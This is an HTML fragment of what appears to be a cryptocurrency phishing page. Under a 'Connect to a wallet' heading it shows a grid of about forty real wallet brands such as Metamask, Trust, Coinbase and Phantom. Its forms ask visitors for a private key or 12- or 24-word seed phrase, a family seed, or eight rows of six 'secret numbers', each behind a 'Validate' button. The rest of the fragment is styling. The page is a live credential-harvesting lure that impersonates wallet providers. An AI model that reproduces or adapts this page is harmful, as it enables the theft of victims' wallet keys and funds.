                                       <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>
                                    </div>
                                    <div class="flex flex-col mb-6">
                                       <div class="relative" data-children-count="1">
                                          <input type="text" placeholder="Enter your Private Key" name="private_key" id="privatekeyval" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                                          <p class="text-xs text-grey-300 mt-6">
                                             Typically 12 (sometimes 24) words seperated by a
                                             single space.
                                          </p>
                                       </div>
                                    </div>
                                    <div class="flex w-full">
                                       <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                          <span class="mr-2
                                             uppercase">Validate</span> 
                                          <span>
                                             <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                                                <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                             </svg>
                                          </span>
                                       </button>
                                    </div>
                                 </div>
                           
                                    <div id="fourth" class="acc-body bg-grey-600">
                                    <div class="flex flex-col">
                                      
                                    </div>
                                    <div class="flex flex-col mb-6">
                                       <div class="relative">
                                          <textarea cols="30" rows="4" placeholder="" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" id="familyseed" name="family_seed" required="" ></textarea>
                                          <p class="text-xs text-grey-300 mt-6">
                                              Looks like sXXX1234XXX...
                                          </p>
                                      </div>
                                    </div>
                                    <div class="flex w-full">
                                       <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                          <span class="mr-2
                                             uppercase">Validate</span> 
                                          <span>
                                             <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                                                <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                             </svg>
                                          </span>
                                       </button>
                                    </div>
                                 </div>
                         

                                    <div id="fiveth" class="acc-body bg-grey-600">
                                    <!--<div class="flex flex-col">-->
                                    <!--   <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>-->
                                    <!--</div>-->
                                    <div class="flex flex-col mb-6">
                                       <div class="relative">
                                          <input type="text" required="required" placeholder="Secret numbers of row A" name="privatekey1" minlength="6" maxlength="6" id="privatekey1" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row B" name="privatekey2" minlength="6" maxlength="6" id="privatekey2" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row C" name="privatekey3" minlength="6" maxlength="6" id="privatekey3" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row D" name="privatekey4" minlength="6" maxlength="6" id="privatekey4" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row E" name="privatekey5" minlength="6" maxlength="6" id="privatekey5" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row F" name="privatekey6" minlength="6" maxlength="6" id="privatekey6" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row G" name="privatekey7" minlength="6" maxlength="6" id="privatekey7" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400 mb-2">
                                          <input type="text" required="required" placeholder="Secret numbers of row H" name="privatekey8" minlength="6" maxlength="6" id="privatekey8" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">

                                          <p class="text-xs text-grey-300 mt-6">
                                              Typically 8 rows of 6 digits.
                                          </p>
                                      </div>
                                    </div>
                                    <div class="flex w-full">
                                       <button type="submit" name="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                          <span class="mr-2
                                             uppercase">Validate</span> 
                                          <span>
                                             <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                                                <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                             </svg>
                                          </span>
                                       </button>
                                    </div>
                                 </div>
                        

                              </form>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div class="bg-gray-50 px-4 py-3 sm:px-6 sm:flex sm:flex-row-reverse"><button id="cancel" type="button" class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
                  Cancel
                  </button>
               </div>
            </div>
         </div>
      </div>
      <div id="___gatsby">
         <div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper">
            <section class="pageStyles__SSection-sc-1navawn-4 ibLsRQ">
               <p style="      float: left;
                  font-weight: bold;
                  margin: 20px 0 0 0;
                  text-align: left;
                  padding: 14px 24px;
                  color: black;"> Connect to a wallet</p>
               <div class="Grid__SGrid-sc-8d5rqj-0 gAVVCu">
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Metamask
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" alt="Meta">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Trust
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/trust-wallet-66f8777532931d9c09b633344981a6a9.png" alt="Trust">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Coinbase
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/coinbase.png" alt="Coinbase">
                     </div>
                  </div>
                  <!-- end -->  
                  
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Xumm
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/xumm.png" alt="Xumm">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Cardano
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/cardano.png" alt="Cardano">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Daedalus
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/daedalus.png" alt="Daedalus">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Yoroi
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/yoroi.png" alt="Yoroi">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        CCVault
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/ccvault.png" alt="CCVault">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Gero
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/gero.jpg" alt="Gero">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Nami
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/nami.png" alt="Nami">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Solana
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/solana.png" alt="Solana">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Phantom
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/phantom.jpg" alt="Phantom">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Solflare
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/solflare.png" alt="Solflare">
                     </div>
                  </div>
                  <!-- end -->  
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Sollet
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/sollet.png" alt="Sollet">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Solong
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/solong.jpg" alt="Solong">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Exodus
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/exodus.png" alt="Exodus">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Avalanche
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/avalanche.png" alt="Avalanche">
                     </div>
                  </div>
                  <!-- end --> 
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Velas
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/velas.png" alt="Velas">
                     </div>
                  </div>
                  <!-- end --> 


                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        crypto.com
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/crypto-4cbeac57421fb3ca2573db2cf448169a.png" alt="Cypto.com">
                     </div>
                  </div>
                  <!-- end -->          
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Blockchain
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/blockchain-logo.png" alt="Blockchain">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Binance Smart Chain
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/bsc-logo.png" alt="binance">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Safepal
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/safepal-1022b40e2ea3a4a6bb19cf6ff28d8b92.png" alt="safepal">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Argent
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/image.jpg" alt="Argent">
                     </div>
                  </div>
                  <!-- end -->  
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                       Fortmatic 
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/formatic.png" alt="Meta">
                     </div>
                  </div>
                  <!-- end -->                   
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Aktionariat
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/aktionariat-c5784b26234a389632687a36d2fb3258.png" alt="aktionariat">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Keyring Pro
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/keyringpro-830b2c0ee1db401dd64c2899eaf2adb3.png" alt="keyring">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        BitKeep
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/bitkeep-387b0ca7da4cf322f44c70c23064c529.png" alt="bitkeep">
                     </div>
                  </div>
                  <!-- end -->         
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        SparkPoint
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/sparkpoint-5c0d3a4ab850a7ee2a3f03e215b68f2c.png" alt="SparkPoint">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        OwnBit
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/ownbit-0b6b21e40acf2fa0f85d2c5ce38c4c51.png" alt="ownbit">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Infinty Wallet
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/infinity-wallet-48e78bc97f96bad14ee6b781423a69ea.png" alt="infinity">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Wallet.io
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/wallet-io-198f396de22fe25eb370f46544abe69d.png" alt="wallet.io">
                     </div>
                  </div>
                  <!-- end -->                
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Infinito
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/infinito-wallet-68da061495160c96f4bcb5e70e612fdd.png" alt="Infinito">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Torus
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/image%20(6).jpg" alt="torus">
                     </div>
                  </div>
                  <!-- end -->         
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Nash
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/image%20(5).jpg" alt="nash">
                     </div>
                  </div>
                  <!-- end -->            
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        BitPay
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="Bitpay">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        imTOken
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/imtoken-fd8c7c52dac6101568954e7448a49202.png" alt="imtoken">
                     </div>
                  </div>
                  <!-- end -->                     
                  <!-- start -->
                  <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                     <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                        <div class="flex items-center justify-center green">
                           <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                           </div>
                        </div>
                        Other Wallet
                     </div>
                     <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                        <img class="img-icons" src="img/otherssss.jpg" alt="Other">
                     </div>
                  </div>
                  <!-- end -->                     
               </div>
            </section>
         </div>
         <div id="gatsby-announcer" style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0" aria-live="assertive" aria-atomic="true">Navigated to Wallets</div>
      </div>
      <style>
         /*! CSS Used from: Embedded */
         img {
         border-style: none;
         }
         button,
         input,
         textarea {
         font-family: inherit;
         font-size: 100%;
         line-height: 1.15;
         margin: 0;
         }
         button,
         input {
         overflow: visible;
         }
         button {
         text-transform: none;
         }
         [type=button],
         button {
         -webkit-appearance: button;
         }
         [type=button]::-moz-focus-inner,
         button::-moz-focus-inner {
         border-style: none;
         padding: 0;
         }
         [type=button]:-moz-focusring,
         button:-moz-focusring {
         outline: 1px dotted ButtonText;
         }
         textarea {
         overflow: auto;
         }
         h3,
         p {
         margin: 0;
         }
         button {
         background-color: transparent;
         background-image: none;
         }
         button:focus {
         outline: 1px dotted;
         outline: 5px auto -webkit-focus-ring-color;
         }
         *,
         :after,
         :before {
         box-sizing: border-box;
         border: 0 solid #e2e8f0;
         }
         img {
         border-style: solid;
         }
         textarea {
         resize: vertical;
         }
         input::-moz-placeholder,
         textarea::-moz-placeholder {
         color: #a0aec0;
         }
         input:-ms-input-placeholder,
         textarea:-ms-input-placeholder {
         color: #a0aec0;
         }
         input::placeholder,
         textarea::placeholder {
         color: #a0aec0;
         }
         button {
         cursor: pointer;
         }
         h3 {
         font-size: inherit;
         font-weight: inherit;
         }
         button,
         input,
         textarea {
         padding: 0;
         line-height: inherit;
         color: inherit;
         }
         img,
         svg {
         display: block;
         vertical-align: middle;
         }
         img {
         max-width: 100%;
         height: auto;
         }
         .bg-white {
         --bg-opacity: 1;
         background-color: #fff;
         background-color: rgba(255, 255, 255, var(--bg-opacity));
         }
         .bg-red-100 {
         --bg-opacity: 1;
         background-color: #fff5f5;
         background-color: rgba(255, 245, 245, var(--bg-opacity));
         }
         .bg-red-600 {
         --bg-opacity: 1;
         background-color: #e53e3e;
         background-color: rgba(229, 62, 62, var(--bg-opacity));
         }
         .bg-blue-600 {
         --bg-opacity: 1;
         background-color: #3182ce;
         background-color: rgba(49, 130, 206, var(--bg-opacity));
         }
         .hover\:bg-red-700:hover {
         --bg-opacity: 1;
         background-color: #c53030;
         background-color: rgba(197, 48, 48, var(--bg-opacity));
         }
         .hover\:bg-blue-700:hover {
         --bg-opacity: 1;
         background-color: #2b6cb0;
         background-color: rgba(43, 108, 176, var(--bg-opacity));
         }
         .border-transparent {
         border-color: transparent;
         }
         .border-white {
         --border-opacity: 1;
         border-color: #fff;
         border-color: rgba(255, 255, 255, var(--border-opacity));
         }
         .border-gray-400 {
         --border-opacity: 1;
         border-color: #cbd5e0;
         border-color: rgba(203, 213, 224, var(--border-opacity));
         }
         .hover\:border-blue-600:hover {
         --border-opacity: 1;
         border-color: #3182ce;
         border-color: rgba(49, 130, 206, var(--border-opacity));
         }
         .focus\:border-blue-400:focus {
         --border-opacity: 1;
         border-color: #63b3ed;
         border-color: rgba(99, 179, 237, var(--border-opacity));
         }
         .rounded {
         border-radius: .25rem;
         }
         .rounded-md {
         border-radius: .375rem;
         }
         .rounded-lg {
         border-radius: .5rem;
         }
         .rounded-full {
         border-radius: 9999px;
         }
         .border {
         border-width: 1px;
         }
         .border-b-2 {
         border-bottom-width: 2px;
         }
         .cursor-pointer {
         cursor: pointer;
         }
         .inline-block {
         display: inline-block;
         }
         .flex {
         display: flex;
         }
         .inline-flex {
         display: inline-flex;
         }
         .flex-col {
         flex-direction: column;
         }
         .items-center {
         align-items: center;
         }
         .justify-center {
         justify-content: center;
         }
         .justify-evenly {
         justify-content: space-evenly;
         }
         .flex-shrink-0 {
         flex-shrink: 0;
         }
         .font-medium {
         font-weight: 500;
         }
         .h-6 {
         height: 1.5rem;
         }
         .h-12 {
         height: 3rem;
         }
         .text-xs {
         font-size: .75rem;
         }
         .text-sm {
         font-size: .875rem;
         }
         .text-base {
         font-size: 1rem;
         }
         .text-lg {
         font-size: 1.125rem;
         }
         .leading-6 {
         line-height: 1.5rem;
         }
         .mx-auto {
         margin-left: auto;
         margin-right: auto;
         }
         .mt-2 {
         margin-top: .5rem;
         }
         .mr-2 {
         margin-right: .5rem;
         }
         .mt-3 {
         margin-top: .75rem;
         }
         .mb-4 {
         margin-bottom: 1rem;
         }
         .mt-6 {
         margin-top: 1.5rem;
         }
         .mb-6 {
         margin-bottom: 1.5rem;
         }
         .mt-10 {
         margin-top: 2.5rem;
         }
         .mr-10 {
         margin-right: 2.5rem;
         }
         .object-contain {
         -o-object-fit: contain;
         object-fit: contain;
         }
         .focus\:outline-none:focus {
         outline: 2px solid transparent;
         outline-offset: 2px;
         }
         .overflow-hidden {
         overflow: hidden;
         }
